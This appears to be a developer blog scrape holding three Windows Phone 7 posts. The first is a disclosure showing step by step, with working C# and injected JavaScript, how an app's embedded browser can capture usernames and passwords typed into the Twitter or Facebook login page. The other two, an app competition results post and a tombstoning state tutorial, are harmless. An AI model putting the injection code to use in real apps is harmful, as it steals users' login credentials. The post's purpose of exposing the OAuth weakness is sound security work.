Hack: OAuth security flaw for Windows Phone 7, iPhone and other Mobile platforms

Hack: OAuth security flaw for Windows Phone 7, iPhone and other Mobile platforms

If you’ve ever had to work with one of the multitude of social networking sites out there (eg Facebook or Twitter) you’d be familiar with Oauth (official documentation is http://oauth.net/ but most sites have their own documentation too). For integrating these sites into a website Oauth seems to be relatively secure. There are a couple of implementations: OAuth 1, which Twitter currently uses which is a royal pain to implement, and then OAuth 2, which Facebook uses. What I’m going to show in this post is just how dangerous OAuth is for rich client applications (ie native applications for desktop and for most mobile platforms).

The original intent behind OAuth was good and noble. It stems from the lack of trust that users have for websites that prompt for a set of credentials that they don’t manage. For example if DodgyWebSite43.com asked for your Facebook credentials you won’t enter them would you! So the idea is to send the user off to Facebook to authenticate; once authenticated the user is returned to the original website along with a token that indicates they’re authenticated.

For rich client applications (in this example I’ll use a Windows Phone 7 application but the point I’m making is in no way an issue with the platform, rather than with OAuth as a protocol) the idea is that you display a web browser control (UIWebView if you’re in iOS-land) and direct the user to sign into the social network of your choice. Once they’re signed in the host application can extract the authenticated token. Again, the idea is that the application isn’t requesting the user’s credentials. In fact, the application shouldn’t be able to access the user’s credentials at any point in the process.

This is where things start to go pair-shaped. Nearly every rich client platform which has a web browser control that can be used to render web content within an application, also allows the host application to interact with the content. In most cases this can be used to invoke javascript. With some relatively basic manipulation of the HTML DOM you can easily, and I mean easily, extract any data that the user enters.

I’ll step through how I did this in my Windows Phone 7 application:

Step 1: Create the UI – some basic XAML to display a WebBrowser control

<phone:WebBrowser x_Name="Browser"
                     ScriptNotify="Browser_ScriptNotify"
                     IsScriptEnabled="True"
                     LoadCompleted="Browser_LoadCompleted" />
 

Notes: I’ve enabled scripts by setting IsScriptEnabled to true. I’ve attached an event handler to the LoadCompleted event; this will allow me to interact with the DOM once the page has rendered. I’ve also attached a handler to the ScriptNotify event; this will allow me to send data from javascript back out to the host application.

Step 2: Navigate to the login screen

void MainPage_Loaded(object sender, RoutedEventArgs e)
{     // Facebook OAuth login: eg http://www.facebook.com/dialog/oauth/?response_type=token...
     // Twitter login: eg mobile.twitter.com/session/new
     this.Browser.Navigate(new Uri("http://mobile.twitter.com/session/new"));
}
 

image

Notes: Running this you’ll see that the browser navigates to the Twitter sign in page – at this point the user is entering their credentials into the Twitter site. However, what they don’t realise is that the application could be sniffing the data they enter.

Step 3: Inject some Javascript

private void Browser_LoadCompleted(object sender, System.Windows.Navigation.NavigationEventArgs e)
{     try
     {
         Browser.InvokeScript("eval", "(function(){" +
             // Find all the input fields
             "var fields = document.getElementsByTagName('input');" +
             // Iterate through looking for text and password fields
             "for(var j=0;j<fields.length;j++){" +
                     "if(fields[j].type=='text' || fields[j].type=='password'){ " +
                         // Attach event handlers to retrieve the changed values
                         "fields[j].attachEvent('onchange',function(e){" +
                             "setTimeout('(function(){window.external.notify("' + e.srcElement.value + '");})()',50);" +
                         "});" +
                 "}} " +
             "})()");
     }     catch     {     }
}
 

Notes: This block of code calls the javascript eval method, passing in a parameter that defines an entire javascript function. eval will interprete and execute that function; this pretty much allows you to run any javascript code you want. Hopefully the comments in the javascript should be enough for you to work out what it does up until the setTimeout method.

The window.external.notify javascript method is how we send data from javascript back out to the host wp7 application. When this method is invoked, it raises the ScriptNotify event on the WebBrowser control, passing the method parameter out into the event handler.

You might be asking why we don’t call window.external.notify directly at this point. Unfortunately if you do that you’ll never see the ScriptNotify event raised. I suspect that this is some sort of conflict occurring on the UI thread – essentially the onchange event is getting raised in javascript due to some UI event from the user (eg moving between fields); this in turn is trying to raise the ScriptNotify event on the UI thread of the browser, which is currently locked. Anyhow, we get around this by effectively delaying the window.external.notify method call by 50 milliseconds.

Step 4: User enters username and password

Notes: After each value is entered the ScriptNotify event is raised, passing out the data entered

Step 5: Extract the data returned from javascript

private void Browser_ScriptNotify(object sender, NotifyEventArgs e)
{     // Extract the exported data
     var txt = e.Value;
}
 

Notes: The variable txt holds the exported value from the text or password input field. The application can then do what it likes with those details.

 

When I run this application and enter values, each field I enter text into is exported (see the list of data values below the WebBrowser).

image

I’ve included this as a working example (don’t forget to unblock the file when you download it):

As you can see it is super easy for a rich client application to effectively steal user’s credentials whilst they are logging in via a WebBrowser control. The moral of this story is that OAuth should not be used for rich client applications and that the social networking sites need to mature and offer a secure mechanism for rich client applications to authenticate against their services without those applications accessing the users credentials directly.

Windows Phone 7 LG App Starter Competition: Winners Announced

Windows Phone 7 LG App Starter Competition: Winners Announced

Firstly, a massive congratulations to everyone who entered both the preliminary concept rounds and the final application round of the Windows Phone 7 LG App Starter Competition. The submissions were all of a very high standard and it is fantastic to see so many applications making use of both device features and the Windows Phone 7 metro interface design and controls.

I’ve already sent out books to the winners for the concept rounds, as some of these concepts aren’t available in the Marketplace yet I won’t publish the details of those ideas/apps. If you were one of the winners and want to be recognised, please feel free to comment on this post and provide a link to your application in the Marketplace.

Unfortunately there is only one winner for the LG Optimus 7 device and it goes to….. Clinton Cherry of Cherry Byte Software with his app, Super Size Me.

image

I love the awesome graphics in this application. Every thing from the start tile (which uses transparency to take advantage of the user selected accent colour) to the background image of the panorama, has been well designed. Some might find the over-the-top use of colours offensive but I think it makes this app eye catching. The additional use of animations and transitions makes for great user experience.

Ok, so if you didn’t win, here are a few pointers:

Speed Matters: Everything from the load time of the application through to how your application responds when the user clicks on an element needs to be tweaked for performance. It’s really easy to build an application that is laggy or doesn’t respond to the user. Make use of background threads for processing and work with the performance metrics to get an idea of how your application will perform.

Tombstoning: PLEASE READ THIS POST (Windows Phone 7- Tombstone Frustration), and if tombstoning still doesn’t make sense, feel free to contact me. I’d be happy to go through this feature with you to ensure it’s done correctly.

Consistency: Read and re-read all of the information about the Metro user experience introduced with Windows Phone 7. Think about how these concepts can be applied to your application. Space things out, use consistent colours and fonts, and make use of the standard or toolkit controls.

Workflow: Put yourself in the position of the user and walk through how the application is going to be used. Firstly, as a brand new user and then as a seasoned user. These two scenarios are key to retaining users.

Windows Phone 7: Tombstone Frustration

Windows Phone 7: Tombstone Frustration

Peter Torr has opened a can of worms by requesting feedback on Tombstoning within Windows Phone 7. Conceptually this isn’t a particularly difficult concept – when your application goes into the background there is a chance that the operating system will terminate the process in order to reclaim system resources. Unfortunately the current implementation in Windows Phone 7 has lead to a lot of confusion. Developers don’t know when their application is going to be terminated, restarted, suspended or resumed. As such they’re using trial and error to attempt to predict when their application is going to be terminated. Let’s start with a couple of examples to illustrate this point.

Scenario 1: Application is not terminated
– User starts an application
– User clicks the start button
– User clicks the back button, returning to the same instance of the application

Scenario 2: Application is terminated (tombstoned) and then restarted
– User starts an application
– User clicks the start button
– User clicks on another application (this will terminate the running instance of the first application)
– User clicks the back button (this will terminate the second application, returning the user to Start)
– User clicks the back button again (this will launch a new instance of the first application)

At the moment the behaviour of WP7 is fairly deterministic, which means that with enough trial and error you can determine all of the scenarios under which your application will be tombstoned or not. However, the premise of the model is that your application could be tombstoned at any stage whilst it is in the background to allow the operaing system to reclaim resources. I think it was one of the earliest CTPs of WP7 that actually behaved this way and it was only in the beta where a more deterministic model was imposed. The upshot of this is that you need to anticipate that your application will be tombstoned when it goes into the background. This is NOT to say that you should assume it has been tombstoned, you just need to code for the case where it is tombstoned.

Ok, so how do we deal with tombstoning…. Again, Peter Torr has a couple of things to say about this in his post on handling activating and deactivating events. In this post Peter discusses the different sequence of events that happens when an application is tombstoned v’s the sequence that happens when it is not. Let me reproduce them again here for your pleasure:

Tombstone Case (typical)

  1. Current page gets OnNavigatedFrom
  2. Application gets Deactivated
  3. Process dies
  4. Process starts
  5. Application gets constructed
  6. Application gets Activated
  7. Current page gets constructed
  8. Current page gets OnNavigatedTo

Non-Tombstone Case (Start -> Back)

  1. Current page gets OnNavigatedFrom
  2. Application gets Deactivated
  3. Application gets Activated
  4. Current page gets OnNavigatedTo

Now, since you want to be able to handle both scenarios it would make sense to only work with events/method calls that happen in both cases. The intersection of these two scenarios actually coincides with the Non-tombstone case where there are OnNavigatedFrom, Deactivated, Activated and OnNavigatedTo events/methods. These are the points where you should be doing ALL transient data persistence and restoration.

“Transient data”….. please define! Ok, I typically think of two different types of data within an application. There is persistent data, which is any data the user has saved or that should survive multiple instances of an app (for example a document that the user saves would be persistent data because they’d expect it to be there the next time they run the app). Then there is transient data, which is any information that the user has entered but hasn’t been saved (for example form fields that have been completed but the form hasn’t been submitted). The user would expect transient information to survive through the lifetime of the page. By this I mean that if they navigate off to another application and then return to the original app the transient data would still be on the page. Conversely if they close the page by navigating using the Back button, they’d expect that data to be lost. Similarly if they restarted the app from the Start they would not expect the data to still be there.

So this bodes the question, how do we persist transient data? If we saved it to isolated storage then it’s going to behave like persistent data. Luckily Windows Phone 7 has a solution in the form of both application and page level state dictionaries. When an application is launched these dictionaries are empty. You can populate these dictionaries with data (key value pairs) and the data will survive tombstoning. The only difference between the application level dictionary and the page level dictionaries are that the page dictionaries only last the lifecycle of the page. When the use clicks the back button to close a page, the associated state dictionary is destroyed.

Ok, so that’s starting to make sense, but where’s the best place to save transient state? The answer to this is based on the lifecycle of the data itself. You may have data that is used application wide, in this case you’ll want to persist and restore this data in the application state dictionary in the Deactivated and Activated events. Alternatively, any data that is page specific should be persisted and restored in the state dictionary for that page in the OnNavigatedFrom and OnNavigatedTo methods.

Example time…..

Application Wide Transient State

public string ApplicationWideData { get; set; }
private void Application_Activated(object sender, ActivatedEventArgs e)
{
    object stateData;
    if (PhoneApplicationService.Current.State.TryGetValue("AppWideData", out stateData))
    {
        ApplicationWideData = stateData as string;
    }
}

private void Application_Deactivated(object sender, DeactivatedEventArgs e)
{
    Debug.WriteLine("Application Deactivated");
    PhoneApplicationService.Current.State["AppWideData"] = ApplicationWideData;
}

 

Page Transient State

protected override void OnNavigatedFrom(System.Windows.Navigation.NavigationEventArgs e)
{
    base.OnNavigatedFrom(e);

    this.State["PageData"] = PageData;

    Debug.WriteLine("(Main Page) Navigated From");
}

protected override void OnNavigatedTo(System.Windows.Navigation.NavigationEventArgs e)
{
    base.OnNavigatedTo(e);

    Debug.WriteLine("(Main Page) Navigated To");

    object stateData;
    if (this.State.TryGetValue("PageData", out stateData))
    {
        PageData = stateData as string;
    }
}

In most cases you’re going to want to persist transient information about the page. You should develop pages so that they don’t rely on any page being created or loaded prior to them. Doing this, and making use of the page state dictionary, is by far the easiest way to handle the challenges associated with tombstoning.